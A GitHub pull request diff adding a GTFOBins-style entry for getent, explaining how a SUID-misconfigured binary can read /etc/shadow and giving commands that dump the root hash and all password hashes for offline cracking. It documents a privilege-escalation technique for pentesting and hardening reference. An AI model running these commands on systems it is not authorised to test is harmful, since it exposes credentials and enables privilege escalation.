Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
18 changes: 18 additions & 0 deletions _gtfobins/getent.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
---
description: |
`getent` is a utility that retrieves entries from administrative databases configured
via the Name Service Switch (NSS). If misconfigured with the SUID bit, it can be abused
to access sensitive databases such as `shadow`, which contains user password hashes,
including root's.

This can lead to local privilege escalation by leaking password hashes for offline cracking.

functions:
suid:
- code: |
# Leak root hash from /etc/shadow via getent SUID binary
./getent shadow root
- code: |
# Dump all hashes
./getent shadow
---